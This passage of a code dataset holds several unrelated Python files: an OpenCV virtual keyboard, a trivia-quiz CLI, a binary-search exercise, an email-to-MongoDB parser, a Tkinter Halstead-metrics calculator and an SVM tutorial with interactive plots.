\"B\", \"N\", \"M\", \",\", \".\", \"/\"],\n [\"ctr\", \"X\", \"C\", \"V\", \"spc\", \"N\", \"M\", \",\", \".\", \"/\"]\n ]\nfinalText = \"\"\n\n\n\n\ndef drawAll(img, buttonList):\n for button in buttonList: # Scan all the button in the keyboard\n x, y = button.pos\n w, h = button.size\n cvzone.cornerRect(img, (button.pos[0], button.pos[1], button.size[0], button.size[1]),\n 20, rt=0)\n cv2.rectangle(img, button.pos, (x + w, y + h), (255, 0, 255), cv2.FILLED)\n cv2.putText(img, button.text, (x + 20, y + 65),\n cv2.FONT_HERSHEY_PLAIN, 4, (255, 255, 255), 4)\n return img\n\n\nclass Button():\n def __init__(self, pos, text, size=[85, 85]):\n self.pos = pos # [ i,j ]\n self.size = size # [width ,height]\n self.text = text\n\n\nbuttonList = []\nfor i in range(len(keys)):\n for j, key in enumerate(keys[i]): # Scan one line in 'keys[[]]'\n buttonList.append(Button([100 * j + 50, 100 * i + 50], key))\n\n###################################\n\n\nwhile True:\n\n success, img = cap.read()\n img = cv2.flip(img, 1)\n hands, img = detector.findHands(img, flipType=False)\n\n if hands:\n # Hand 1\n hand1 = hands[0]\n lmList1 = hand1[\"lmList\"] # List of 21 Landmarks points\n #bbox1 = hand1[\"bbox\"] # Bounding Box info x,y,w,h\n #centerPoint1 = hand1[\"center\"] # center of the hand cx,cy\n #handType1 = hand1[\"type\"] # Hand Type Left or Right\n\n img = drawAll(img, buttonList)\n\n if lmList1: # If we can see a hand\n for button in buttonList: # Loop all the buttons\n x, y = button.pos\n w, h = button.size\n # Change background color of the specific button\n\n lmx, lmy, _ = (hand1[\"lmList\"][8])\n lm8 = (lmx, lmy)\n\n if ( x < lmx < x + w and y < lmy < y + h ):\n cv2.rectangle(img, (x - 5, y - 5), (x + w + 5, y + h + 5), (175, 0, 175), cv2.FILLED)\n cv2.putText(img, button.text, (x + 20, y + 65),\n cv2.FONT_HERSHEY_PLAIN, 4, (255, 255, 255), 4)\n\n\n lmx, lmy, _ = (hand1[\"lmList\"][12])\n lm12 = (lmx, lmy)\n\n print(lm8,' ',button.text)\n l, _, _ = detector.findDistance(lm8, lm12, img) # , draw=False)\n\n\n # If clicked (distance between two fingers is smaller )\n if l < 80:\n\n cv2.rectangle(img, button.pos, (x + w, y + h), (0, 255, 0), cv2.FILLED)\n cv2.putText(img, button.text, (x + 20, y + 65),\n cv2.FONT_HERSHEY_PLAIN, 4, (255, 255, 255), 4)\n finalText += button.text\n sleep(0.45)\n y1 = 550\n y2 = y1 + 60\n y3 = y1 + 52\n cv2.rectangle(img, (50, y1), (700, y2), (175, 0, 175), cv2.FILLED)\n cv2.putText(img, finalText, (60, y3),\n cv2.FONT_HERSHEY_PLAIN, 5, (255, 255, 255), 5)\n\n cv2.imshow(\"Image\", img)\n if cv2.waitKey(20) & 0xFF == ord('q'):\n break\n","repo_name":"danizalm05/python01","sub_path":"opencv/murtazaNew/AI Virtual Keyboard/vrtKeybord00.py","file_name":"vrtKeybord00.py","file_ext":"py","file_size_in_byte":3920,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"28344971753","text":"\r\nimport sys\r\nimport html\r\nfrom enum import Enum\r\nimport requests\r\nfrom fake_headers import Headers\r\n\r\nh = Headers()\r\n\r\nclass Options(Enum):\r\n true_ = 'T'\r\n false_ = 'F'\r\n\r\nclass OptionsABC(Enum):\r\n A = 'A'\r\n B = 'B'\r\n C = 'C'\r\n D = 'D'\r\n\r\nclass Category(Enum):\r\n gen = 'gen'\r\n sports = 'sports'\r\n computing = 'computing'\r\n politics = 'politics'\r\n art = 'art'\r\n history = 'history'\r\n geography = 'geography'\r\n celebrities = 'celebrities'\r\n animals = 'animals'\r\n anime = 'anime'\r\n nature='nature'\r\n books = 'books'\r\n math = 'math'\r\n\r\n\r\nclass Difficulty(Enum):\r\n easy = 'easy'\r\n 
medium = 'medium'\r\n hard = 'hard'\r\n any1 = 'any' \r\n\r\nclass Questions:\r\n # TOTAL = 10\r\n score = 0\r\n CATS = { 'gen':9, 'books':10, 'nature':17, 'computing':18, 'math':19, 'sports':21,'geography':22, 'history':23, \r\n 'politics':24, 'art':25, 'celebrities':26, 'animals':27, 'anime':32 }\r\n\r\n def __init__(self,cat,level,total):\r\n self.TOTAL = total\r\n self.cat_selected = self.CATS[cat.value]\r\n if level.value == 'any':\r\n url = f'https://opentdb.com/api.php?amount={self.TOTAL}&category={self.cat_selected}&type=multiple'\r\n else: \r\n url = f'https://opentdb.com/api.php?amount={self.TOTAL}&category={self.cat_selected}&difficulty={level.value}&type=multiple'\r\n\r\n print(f\"\\nCATEGORY: {cat.value}, DIFFICULTY: {level.value}\")\r\n self.r = requests.get(url, headers=h.generate())\r\n self.question_bank_ABC = []\r\n \r\n for item in self.r.json()['results']:\r\n opts = [html.unescape(i) for i in item['incorrect_answers']]\r\n opts.append(html.unescape(item['correct_answer']))\r\n\r\n self.question_bank_ABC.append({'Q': html.unescape(item['question']), 'A': html.unescape(item['correct_answer']),\r\n 'WA': [html.unescape(k) for k in item['incorrect_answers']],\r\n 'Options': sorted(opts)})\r\n\r\n self.level = level\r\n self.get_questions(self.level)\r\n\r\n def get_questions(self, level):\r\n url = f'https://opentdb.com/api.php?amount={self.TOTAL}&category={self.cat_selected}&difficulty={level.value}&type=boolean'\r\n self.r2 = requests.get(url, headers=h.generate())\r\n self.question_bank = [{'Q': html.unescape(i['question']), 'A':html.unescape(\r\n i['correct_answer'])} for i in self.r2.json()['results']]\r\n\r\n def quizer_tf(self):\r\n '''True/False quiz brain '''\r\n if len(self.r2.json()['results']) > 0:\r\n for num, item in enumerate(self.question_bank):\r\n print(\r\n f\"\\n{num+1}. {item['Q']} \\n(True or False. Enter T or F)\")\r\n print('-------------------------------------------')\r\n user_answer = input('\\nEnter your option: ').upper()\r\n while user_answer not in [i.value for i in Options]:\r\n print('\\n **** Invalid Input. *** \\nPlease Enter T or F')\r\n user_answer = input('Enter your option: ').upper()\r\n if user_answer == item['A'][0].upper():\r\n self.score += 1\r\n print(\r\n f'Correct. \\nCurrent Score:\\t{self.score}/{self.TOTAL}\\n')\r\n print('---------------------------------------')\r\n else:\r\n print('---------------------------------------')\r\n print(f\"**** Oops, wrong answer. \\n\")\r\n\r\n print('\\n****************************')\r\n print(f'\\nFinal Score:\\t{self.score}/{self.TOTAL}')\r\n print('\\n****************************')\r\n else:\r\n print('Not available. Try another option')\r\n sys.exit()\r\n\r\n def quizer_mcq(self):\r\n '''multiple choice quiz brain '''\r\n if len(self.r.json()['results']) > 0:\r\n for num, item in enumerate(self.question_bank_ABC):\r\n print(f\"\\n\\n{num+1}. {item['Q']}\")\r\n print('-------------------------------------------')\r\n show_options = {'A': item['Options'][0], 'B': item['Options'][1],\r\n 'C': item['Options'][2], 'D': item['Options'][3]}\r\n [print(f\"{k}. {v}\", sep='\\n') for k, v in show_options.items()]\r\n user_answer = input(\r\n '\\nEnter your option (A, B, C, or D): ').upper()\r\n while user_answer not in [i.value for i in OptionsABC]:\r\n print('\\n **** Invalid Input. *** \\nPlease Enter A, B, C, or D')\r\n user_answer = input('Enter your option: ').upper()\r\n\r\n if show_options[user_answer] == item['A']:\r\n self.score += 1\r\n print(\r\n f'Correct. 
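# Open Trivia DB returns questions with HTML entities, which is why every string
# above goes through html.unescape before display. Example entity round-trip:
import html

raw = "What does &quot;HTTP&quot; stand for? &amp; why?"
print(html.unescape(raw))   # What does "HTTP" stand for? & why?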
\\nCurrent Score:\\t{self.score}/{self.TOTAL}\\n')\r\n print('---------------------------------------')\r\n else:\r\n print('---------------------------------------')\r\n print(\r\n f\"**** Oops, wrong answer. \\n The Correct answer is: {item['A']}\")\r\n\r\n print('\\n****************************')\r\n print(f'\\nFinal Score:\\t{self.score}/{self.TOTAL}')\r\n print('\\n****************************')\r\n else:\r\n print('Not available. Try another option')\r\n sys.exit()\r\n","repo_name":"ubongab/quiz-cli","sub_path":"classes.py","file_name":"classes.py","file_ext":"py","file_size_in_byte":5487,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"474602768","text":"\"\"\"利用二分法查找有序列表\"\"\"\r\n\r\ndef two_find(list, index):\r\n list.sort()\r\n min = 0 # 设置最小下限\r\n maxl = len(list) # 设置最大上限\r\n if index in list:\r\n while True:\r\n midl = (min + maxl) // 2 # 分段\r\n if list[midl] > index: # index在list左侧\r\n maxl = midl\r\n elif list[midl] < index: # index在list右侧\r\n min = midl\r\n elif list[midl] == index:\r\n print(\"{} 在 {} 中的下标是 {}\".format(index, list, midl))\r\n break\r\n else:\r\n print(\"没有该数字\")\r\n\r\n\r\nif __name__ == \"__main__\":\r\n arr = [1, 6, 7, 9, 12, 43, 13, 54, 65, 43, 23, 22, 15, 0, 100]\r\n while True:\r\n num = input(\"请输入一个整数: \")\r\n if num == 'exit' or num == '':\r\n print('退出...')\r\n break\r\n try:\r\n k = int(num)\r\n two_find(arr, k)\r\n except Exception as e:\r\n print(e)\r\n\r\n","repo_name":"zcguderian/-","sub_path":"two_find(利用二分法查找列表值).py","file_name":"two_find(利用二分法查找列表值).py","file_ext":"py","file_size_in_byte":1004,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"16407677114","text":"#!/usr/bin/env python\nimport sys\nimport re\nimport hashlib\nfrom pymongo import MongoClient\nimport bson\n\nclient = MongoClient()\ndb = client.blackmailedDB\nmainCollection = db.mainCollection\n\nfile_name = sys.argv[1]\nemails_raw = open(file_name, \"r\")\nemail_temp = ''\nreceived_count = 1\n\n\ndef hash_check(hash_sha1):\n\n if db.mainCollection.find().count() > 0:\n if not db.mainCollection.find({'email_hash': hash_sha1}).count() == 0:\n hashResult = True\n else:\n hashResult = False\n else:\n hashResult = False\n return(hashResult)\n\n\ndef unicode_detect(test_value):\n try:\n #This code could deal with other encodings, like latin_1\n #but that's not the point here\n test_value.decode('utf-8')\n\n except UnicodeDecodeError:\n test_value = bson.binary.Binary(str(test_value))\n\n return(test_value)\n\nx = 0\n\nfor line in emails_raw:\n temp_line = line.replace('\\r\\n', '\\n') # convert to standard Unix return values\n email_temp += temp_line\n\n if re.match(r'\\.\\n', temp_line): # find end of email\n\n messageSHA1 = hashlib.sha1(email_temp).hexdigest()\n\n boolValue = hash_check(messageSHA1)\n\n if boolValue is True:\n #print('--------------------------------ALREADY HERE---------------------------------------')\n email_temp = '' # Cleared to prepare for next email\n\n else:\n #print('-----------------------------NEW EMAIL INSERTED------------------------------------')\n email_split = email_temp.split('\\n\\n', 1)\n header_temp = email_split[0]\n body_temp = email_split[1]\n email_temp = '' # Cleared to prepare for next email\n header_list = header_temp.split('\\n')\n email_dict = {}\n email_dict['email_hash'] = messageSHA1\n email_dict['email_body'] = {}\n email_dict['email_header'] = {}\n header_temp = [] # reuse the header_temp\n\n # Processing the 
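# two_find above guards the loop with `index in list`, which is already a linear
# scan and defeats the point of bisecting. The standard-library bisect module
# gives the same lookup in O(log n) directly:
from bisect import bisect_left

def two_find_bisect(values, target):
    values = sorted(values)
    i = bisect_left(values, target)
    return i if i < len(values) and values[i] == target else None

print(two_find_bisect([1, 6, 7, 9, 12, 43, 13], 9))   # 3 (index in sorted list)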
headers into a dictionary\n for x in range(len(header_list)):\n if re.match(r'(.*):', header_list[x]) and not re.match(r'\\t|\\s(.*)', header_list[x]): # find email header categories\n header_temp.append(header_list[x])\n elif re.match(r'\\t|\\s(.*)', header_list[x]): # find email headers with \\t or ' ' beginning\n header_temp[len(header_temp) - 1] += header_list[x]\n else:\n header_temp.append(header_list[x] + ': NONE')\n\n for y in range(len(header_temp)):\n header_list = header_temp[y].split(':', 1)\n header_list[0] = unicode_detect(header_list[0])\n header_list[0] = re.sub('\\.', '_-_', header_list[0])\n if header_list[0] == 'Received':\n header_list[0] = 'Received_' + str(received_count)\n received_count += 1\n email_dict['email_header'][header_list[0]] = unicode_detect(header_list[1].lstrip())\n body_temp = unicode_detect(body_temp)\n email_dict['email_body']['body'] = body_temp\n mainCollection.insert(email_dict)\n received_count = 1\n\nemails_raw.close()\n\n","repo_name":"iv0ryw0lf/bmpublic","sub_path":"bmparser.py","file_name":"bmparser.py","file_ext":"py","file_size_in_byte":3229,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"22079477555","text":"import tkinter\nimport sourses\nimport math\nfrom tkinter import *\nfrom tkinter import scrolledtext, filedialog, messagebox\n\nfrom createTable import createTable\nfrom ourclass import RecordOperators\nfrom workWithOperators import findingOperators, findDot, deleteRepeatObj, editFunc\n\n\ndef delitingMultiComments(redString):\n i = 0\n while i < len(redString):\n if redString[i] == \"/**\" or redString[i] == \"*\" or redString[i] == \"*/\" or redString[i] == \"/*\":\n retStr = \" \"\n return retStr\n else:\n i += 1\n return redString\n\n\ndef delitingMultigovno(redString):\n i = 0\n while i < len(redString):\n if redString[i] == \"/*\":\n return 1\n else:\n i += 1\n return 0\n\n\n# удаляю строки с импортами и пэкеджами\ndef delitingOfImport(redString):\n i = 0\n while i < len(redString):\n if redString[i] == \"import\" or redString[i] == \"package\" or redString[i] == \"//\" or redString[i] == \"class\" or redString[i] == \"static\":\n returnString = ' '\n return returnString\n i += 1\n return redString\n\n\ndef returningOfnames(redString):\n i = 0\n newLine = \" \"\n while i < len(redString):\n if redString[i] == \"$\" and len(redString[i + 1]) <= len(redString) and redString[i + 1] == \"{\":\n end = redString.find(\"}\")\n j = i\n while j <= end:\n newLine += redString[j]\n j += 1\n return newLine\n else:\n i += 1\n redString = \" \"\n return redString\n\n\n# удаляю всякие распечатки строк\ndef delitingOfStrings(redString):\n finding = '\"'\n newLine = \" \"\n if redString.find(finding) != -1:\n start = redString.find(finding)\n ending = redString.rfind(finding)\n i = 0\n while i <= start:\n newLine += redString[i]\n i += 1\n i = ending\n while i < len(redString):\n newLine += redString[i]\n i += 1\n\n smLine = \" \"\n i = start + 1\n while i < ending:\n smLine += redString[i]\n i += 1\n workString = returningOfnames(redString)\n newLine = newLine + \" \" + workString\n else:\n newLine = redString\n return newLine\n\n\n# создание листа с операторами и их подсчётом\ndef editingOperatorsList(listOfOperators):\n i = 0\n h = 0\n length = len(listOfOperators)\n while i < length:\n j = i + 1\n while j < length:\n if listOfOperators[i].name == listOfOperators[j].name:\n listOfOperators[i].amount = listOfOperators[i].amount + listOfOperators[j].amount\n del listOfOperators[j]\n 
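# The header loop above treats a line starting with a tab or space as a
# continuation ("folded" header, per RFC 5322) and glues it onto the previous
# entry. A tiny illustration of the two regexes involved, with a made-up header:
import re

lines = ["Received: from mail.example.com", "\tby mx.example.org; Mon, 1 Jan"]
print(bool(re.match(r'(.*):', lines[0])))        # True  -> new header field
print(bool(re.match(r'\t|\s(.*)', lines[1])))    # True  -> continuation line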
h += 1\n length = len(listOfOperators)\n else:\n j += 1\n i += 1\n i = 0\n while i < len(listOfOperators):\n if listOfOperators[i].name == 'if':\n j = 0\n while j < len(listOfOperators):\n if listOfOperators[j].name == 'else':\n if listOfOperators[i].amount > listOfOperators[j].amount:\n listOfOperators[j].name = listOfOperators[i].name + '..' + listOfOperators[j].name\n listOfOperators[i].amount = listOfOperators[i].amount - listOfOperators[j].amount\n else:\n listOfOperators[i].name = listOfOperators[i].name + '..' + listOfOperators[j].name\n del listOfOperators[j]\n break\n else:\n j += 1\n elif listOfOperators[i].name == 'try':\n j = 0\n while j < len(listOfOperators):\n if listOfOperators[j].name == 'catch':\n if listOfOperators[i].amount > listOfOperators[j].amount:\n listOfOperators[j].name = listOfOperators[i].name + '..' + listOfOperators[j].name\n listOfOperators[i].amount = listOfOperators[i].amount - listOfOperators[j].amount\n else:\n listOfOperators[i].name = listOfOperators[i].name + '..' + listOfOperators[j].name\n del listOfOperators[j]\n j = 0\n while j < len(listOfOperators):\n if listOfOperators[j].name == 'finally':\n if listOfOperators[i].amount > listOfOperators[j].amount:\n listOfOperators[j].name = listOfOperators[i].name + '..' + listOfOperators[j].name\n listOfOperators[i].amount = listOfOperators[i].amount - listOfOperators[j].amount\n else:\n listOfOperators[i].name = listOfOperators[i].name + '..' + listOfOperators[j].name\n del listOfOperators[j]\n elif listOfOperators[j].name == 'finally':\n if listOfOperators[i].amount > listOfOperators[j].amount:\n listOfOperators[j].name = listOfOperators[i].name + '..' + listOfOperators[j].name\n listOfOperators[i].amount = listOfOperators[i].amount - listOfOperators[j].amount\n else:\n listOfOperators[i].name = listOfOperators[i].name + '..' 
+ listOfOperators[j].name\n                        del listOfOperators[j]\n                else:\n                    j += 1\n        i += 1\n    return listOfOperators\n\n\n# delete OOP keywords\ndef delitingOfOOP(redString):\n    i = 0\n    while i < len(redString):\n        if sourses.oop_delete.get(redString[i], 0) != 0:\n            del redString[i]\n        else:\n            i += 1\n    return redString\n\n\n# set the checkbox value and toggle the visibility of the open-file button\ndef setChoose():\n    var.set(not var.get())\n    if var.get():\n        openFileBtn.pack_forget()\n        chooseInputType.deselect()\n    else:\n        chooseInputType.select()\n        openFileBtn.pack()\n\n\ndef editFuncList(operators, operands, func):\n    i = 0\n    while i < len(func):\n        j = 0\n        while j < len(operands):\n            if operands[j].name == func[i].name:\n                funcOpr = RecordOperators(func[i].name, 1)\n                operators.append(funcOpr)\n                operators.extend(func[i].operators)\n                operands.extend(func[i].operands)\n                del operands[j]\n            else:\n                j += 1\n        i += 1\n    return operators, operands\n\n\n# show result table\ndef showTable():\n    if inputText.get('0.1') == '\\n':\n        messagebox.showerror('Error', 'Please, choose your file or enter your text')\n    else:\n        list1, list2, list3 = readFromTextbox()\n        list2 = deleteRepeatObj(list2)\n        list1, list2 = editFuncList(list1, list2, list3)\n        list2 = deleteRepeatObj(list2)\n        list1 = editingOperatorsList(list1)\n        # compute the metrics\n        programmDictionary = len(list1) + len(list2)\n        programmLength = 0\n        i = 0\n        while i < len(list1):\n            programmLength += list1[i].amount\n            i += 1\n        i = 0\n        while i < len(list2):\n            programmLength += list2[i].initialization + list2[i].usability\n            i += 1\n\n        programPower = programmLength * math.log2(programmDictionary)\n        createTable(list1, list2, str(int(programPower)))\n\n\ndef convert(list):\n    # Converting integer list to string list\n    i = 0\n    res = ''\n    while i < len(list):\n        res = res + ' ' + list[i]\n        i += 1\n    return (res)\n\n\ndef readFromTextbox():\n    resultListOfOperators = []\n    resultOfOperands = []\n    funcList = []\n    text = inputText.get('1.0', END).splitlines()\n    i = 0\n    while i < len(text):\n        line = text[i]\n        if line != '':\n            line = text[i].split()\n            str = text[i]\n            if line[0] == 'def':\n                ind1 = ind2 = 0\n                funcStr = ''\n                while ind1 != ind2 or ind1 == ind2 == 0:\n                    j = 0\n                    line = text[i].split()\n                    while j < len(line):\n                        if line[j] == '{':\n                            ind1 += 1\n                        elif line[j] == '}':\n                            ind2 += 1\n                        j += 1\n                    delStringLine = delitingOfStrings(text[i])\n                    anotherDel = delitingMultiComments(delStringLine.split())\n                    lineWithDot = convert(delitingOfOOP(anotherDel))\n                    funcStr = funcStr + ' ' + lineWithDot\n                    i += 1\n                funcList.append(editFunc(funcStr.split()))\n            else:\n                delStringLine = delitingOfStrings(str)\n                anotherDel = delitingMultiComments(delStringLine.split())\n                if anotherDel != \" \":\n                    lineWithoutImport = delitingOfImport(anotherDel)\n                    if lineWithoutImport != \" \":\n                        lineWithDot = delitingOfOOP(lineWithoutImport)\n                        operators, operands = findingOperators(findDot(lineWithDot))\n                        resultListOfOperators.extend(operators)\n                        resultOfOperands.extend(operands)\n                i += 1\n        else:\n            i += 1\n    finalOperatorsList = editingOperatorsList(resultListOfOperators)\n    return finalOperatorsList, resultOfOperands, funcList\n\n\n# open a dialog to pick a file and store its path in fileName,\n# then read the file line by line into the text area of the main form\ndef openFile():\n    fileName = filedialog.askopenfilename(filetypes=((\"TXT files\", \"*.txt\"),))\n    inputText.delete('1.0', END)\n    name = fileName\n    try:\n        f = open(name, 'r')\n        numOfLine = 0\n        for line in f:\n            if numOfLine == 0:\n                line = line[1:]\n                line = line[:0] 
+ ' ' + line[2:]\n            inputText.insert(END, line)\n            numOfLine = numOfLine + 1\n    except (OSError, IOError) as e:\n        messagebox.showerror('Error', 'Please, choose your file or enter your text')\n\n\n# add all the components to the main form and set their sizes\n\nwindow = tkinter.Tk()\nwindow.title(\"Halstead's metrics\")\nwindow.geometry(\"1000x550\")\nvar = BooleanVar()\nvar.set(0)\nf_top = Frame(window)\nf_bot = Frame(window)\ntextForInput = Label(f_top, width=20, height=2, text=\"Please, enter your program\")\nopenFileBtn = Button(f_bot, width=20, height=2, text=\"Open File\", command=openFile)\nchooseInputType = Checkbutton(f_top, width=20, height=2, text=\"Read from file\", variable=var, command=setChoose)\ninputText = scrolledtext.ScrolledText(f_bot, width=700, height=25)\ninputText.configure(font=\"Calibri 10\")\nanalyseBtn = Button(f_bot, width=20, height=2, text=\"Analyse\", command=showTable)\n\nf_top.pack()\nf_bot.pack()\n\ntextForInput.pack(side=LEFT)\nchooseInputType.pack()\ninputText.pack(side=TOP, padx=10, pady=10)\nanalyseBtn.pack(side=BOTTOM, padx=10, pady=10)\n\nwindow.mainloop()\n","repo_name":"MarySoroka/Halstead-mentrics","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":11089,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"13660686872","text":"# -*- coding: utf-8 -*-\r\n\r\n#%%\r\n#==========================\r\n# SUPPORT VECTOR MACHINES #\r\n#==========================\r\n\r\nimport seaborn as sns\r\nsns.set()\r\n\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\nfrom sklearn import svm\r\n\r\n#%%\r\n#========================\r\n# HARD MARGIN CLASSIFIER\r\n#========================\r\n\r\nfrom sklearn.datasets import make_blobs\r\n\r\nX, y = make_blobs(centers=[[1, 1], [-1, -1]], cluster_std=0.4, random_state=0)\r\nx = np.linspace(-2, 2, 100)\r\n\r\nplt.scatter(X[:, 0], X[:, 1], c=y, cmap=plt.cm.bwr)\r\nplt.plot(x, -x+0.25, '--k')\r\nplt.plot(x, -0.25*x-0.3, 'r--')\r\nplt.plot(x, -1.5*x+1, 'b--')\r\nplt.xlim([-2, 2])\r\nplt.ylim([-2, 2])\r\nplt.xlabel('$x_1$')\r\nplt.ylabel('$x_2$');\r\n\r\n#%%\r\n#================================\r\n# DETERMINING THE MAXIMUM MARGIN\r\n#================================\r\n\r\nfrom ipywidgets import interact, IntSlider, FloatSlider, fixed\r\nfrom sklearn import svm\r\n\r\ndef plot_svc_interact(X, y):\r\n    def plotter(log_C=1):\r\n        clf = svm.SVC(C=10**log_C, kernel='linear')\r\n        clf.fit(X, y)\r\n        \r\n        beta = clf.coef_[0]\r\n        beta_0 = clf.intercept_\r\n        slope = -beta[0]/beta[1]\r\n        intercept = -beta_0/beta[1]\r\n        \r\n        x_max = np.ceil(np.abs(X).max())\r\n        x = np.linspace(-x_max, x_max, 100)\r\n        margin_bound_1 = 1/beta[1] + slope*x + intercept\r\n        margin_bound_2 = -1/beta[1] + slope*x + intercept\r\n\r\n        plt.plot(x, slope*x + intercept, 'k')\r\n        plt.fill_between(x, margin_bound_1, margin_bound_2, color='k', alpha=0.25, linewidth=0)\r\n        plt.scatter(*clf.support_vectors_.T, s=100, c='y')\r\n        plt.scatter(X[:, 0], X[:, 1], c=y, cmap=plt.cm.bwr)\r\n        plt.axis([-x_max, x_max, -x_max, x_max])\r\n\r\n    return plotter\r\n\r\nplot_svc_interact(X, y)(log_C=2)\r\n\r\n#%%\r\n#========================\r\n# SOFT MARGIN CLASSIFIER\r\n#========================\r\n\r\n\r\nx = np.linspace(-1, 2, 100)\r\nhinge_loss = lambda x: -(x-1) if x-1 < 0 else 0\r\n\r\nplt.plot(x, list(map(hinge_loss, x)))\r\nplt.xlabel(\"$y(x\\cdot\\\\beta + \\\\beta_0$)\")\r\nplt.ylabel('loss');\r\n\r\n#%%\r\n# Training the soft margin classifier on a data set that is not completely 
linearly separable\r\n\r\nfrom sklearn.datasets import make_blobs\r\n\r\nX, y = make_blobs(centers=[[1, 1], [-1, -1]], cluster_std=1.5, random_state=0, n_samples=200)\r\n\r\nlog_C_slider = FloatSlider(min=-4, max=2, step=0.25, value=0, description='$\\log(C)$')\r\ninteract(plot_svc_interact(X, y), log_C=log_C_slider);\r\n\r\n#%%\r\n#======================================\r\n# KERNELS FOR NONLINEAR CLASSIFICATION\r\n#======================================\r\n\r\nfrom sklearn.datasets import make_circles\r\n\r\nX, y = make_circles(n_samples=200, noise=0.2, factor=0.25, random_state=0)\r\nplt.scatter(*X.T, c=y, cmap=plt.cm.bwr)\r\nplt.xlabel('$x_1$')\r\nplt.ylabel('$x_2$');\r\n\r\n#%%\r\n# we can create a new feature, $x_3$, the distance from the origin.\r\n# With the new feature, we are projecting our data onto a higher dimensional space.\r\n# \r\nfrom mpl_toolkits.mplot3d import Axes3D\r\n\r\ndef plot_projection(X, y):\r\n    XX, YY = np.meshgrid(np.linspace(-1, 1, 20), np.linspace(-1, 1, 20))\r\n    ZZ = 0.6*np.ones((20, 20))\r\n    x_3 = (X[:, 0]**2 + X[:, 1]**2)**0.5\r\n    X_new = np.hstack((X, x_3.reshape(-1, 1)))\r\n\r\n    def plotter(elev=30, azim=30):\r\n        fig = plt.figure()\r\n        ax = plt.axes(projection='3d')\r\n        ax.scatter(*X_new.T, c=y, cmap=plt.cm.bwr)\r\n        ax.plot_surface(XX, YY, ZZ, alpha=0.2);\r\n        ax.view_init(elev, azim)\r\n        ax.set_xlabel('$x_1$')\r\n        ax.set_ylabel('$x_2$')\r\n        ax.set_zlabel('$x_3$')\r\n\r\n    return plotter\r\n\r\ninteract(plot_projection(X, y), elev=(0, 360), azim=(0, 360));\r\n\r\n#%%\r\n#====================\r\n# CHOICES OF KERNELS\r\n#====================\r\n\r\ndef plot_decision_boundary(X_train, X_test, y_train, y_test):\r\n    def plotter(kernel='linear', log_gamma=1, log_C=1, deg=1, coef0=1):\r\n        clf = svm.SVC(C=10**log_C, kernel=kernel, gamma=10**log_gamma, coef0=coef0, probability=True)\r\n        clf.fit(X_train, y_train)\r\n        \r\n        X1, X2 = np.meshgrid(np.linspace(-2, 3), np.linspace(-2, 2))\r\n        y_proba = clf.predict_proba(np.hstack((X1.reshape(-1, 1), X2.reshape(-1, 1))))[:, 1]\r\n        plt.contourf(X1, X2, y_proba.reshape(50, 50), 16, cmap=plt.cm.bwr, alpha=0.75)\r\n        plt.colorbar()\r\n\r\n        accuracy = clf.score(X_test, y_test)\r\n        plt.scatter(X_train[:, 0], X_train[:, 1], c=y_train, edgecolors='white', cmap=plt.cm.bwr)\r\n        plt.xlabel('$x_1$')\r\n        plt.ylabel('$x_2$')\r\n        plt.title('test set accuracy: {}'.format(accuracy));\r\n\r\n    return plotter\r\n\r\n\r\nfrom sklearn.datasets import make_moons\r\nfrom sklearn.model_selection import train_test_split\r\n\r\nX, y = make_moons(400, noise=0.25, random_state=0)\r\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.5, random_state=0)\r\n\r\nlog_C_slider = FloatSlider(min=-4, max=4, step=0.25, value=0, description='$\\log(C)$')\r\nlog_gamma_slider = FloatSlider(min=-3, max=2, step=0.01, value=0, description='$\\log(\\gamma$)')\r\ndeg_slider = IntSlider(min=1, max=4, step=1, value=2, description='$d$')\r\ncoef0_slider = FloatSlider(min=-100, max=100, step=0.1, value=0, description='$r$')\r\n\r\ninteract(plot_decision_boundary(X_train, X_test, y_train, y_test),\r\n         log_C=log_C_slider,\r\n         log_gamma=log_gamma_slider, \r\n         kernel=['rbf', 'linear', 'sigmoid', 'poly'],\r\n         deg=deg_slider,\r\n         coef0=coef0_slider);\r\n\r\n#%%\r\n#=====================================\r\n# COMPARISON WITH LOGISTIC REGRESSION\r\n#=====================================\r\n\r\nx = np.linspace(-6, 4, 100)\r\nhinge_loss = lambda x: -(x-1) if x < 1 else 0\r\nlog_loss = np.log(1+np.exp(-x))\r\n\r\nplt.plot(x, list(map(hinge_loss, x)))\r\nplt.plot(x, 
log_loss, '--r')\r\nplt.xlabel(\"$y(x \\cdot \\\\beta + \\\\beta_0)$\")\r\nplt.ylabel('loss');\r\n\r\n#%%\r\n\r\n\r\n\r\n\r\nfrom sklearn.linear_model import LogisticRegression\r\n\r\ndef plot_svc_vs_lr(cluster_std=0.8, log_C=1, model='logistic regression', outlier=False):\r\n    X, y = make_blobs(centers=[[1, 1], [-1, -1]], cluster_std=cluster_std, random_state=0)\r\n\r\n    if outlier:\r\n        X = np.vstack((X, [-1.5, 0.]))\r\n        y = np.hstack((y, [0]))\r\n\r\n    name_to_clf = {'logistic regression': LogisticRegression(C=10**log_C, solver='lbfgs'),\r\n                   'SVM': svm.SVC(C=10**log_C, kernel='linear')}\r\n    \r\n    clf = name_to_clf[model]\r\n    clf.fit(X, y)\r\n    \r\n    beta = clf.coef_[0]\r\n    beta_0 = clf.intercept_\r\n    slope = -beta[0]/beta[1]\r\n    intercept = -beta_0/beta[1]\r\n    \r\n    x_max = np.ceil(np.abs(X).max())\r\n    x = np.linspace(-x_max, x_max, 100)\r\n\r\n    plt.plot(x, slope*x + intercept, 'k')\r\n    plt.scatter(X[:, 0], X[:, 1], c=y, cmap=plt.cm.bwr)\r\n    plt.axis([-x_max, x_max, -x_max, x_max])\r\n    \r\n#%% \r\nlog_C_slider = FloatSlider(min=-4, max=4, step=0.25, value=1, description='$\\log(C)$')\r\ncluster_std_slider = FloatSlider(min=0.2, max=1.0, step=0.05, value=0.8, description='cluster $\\sigma$')\r\n\r\ninteract(plot_svc_vs_lr,\r\n         cluster_std=cluster_std_slider,\r\n         log_C=log_C_slider,\r\n         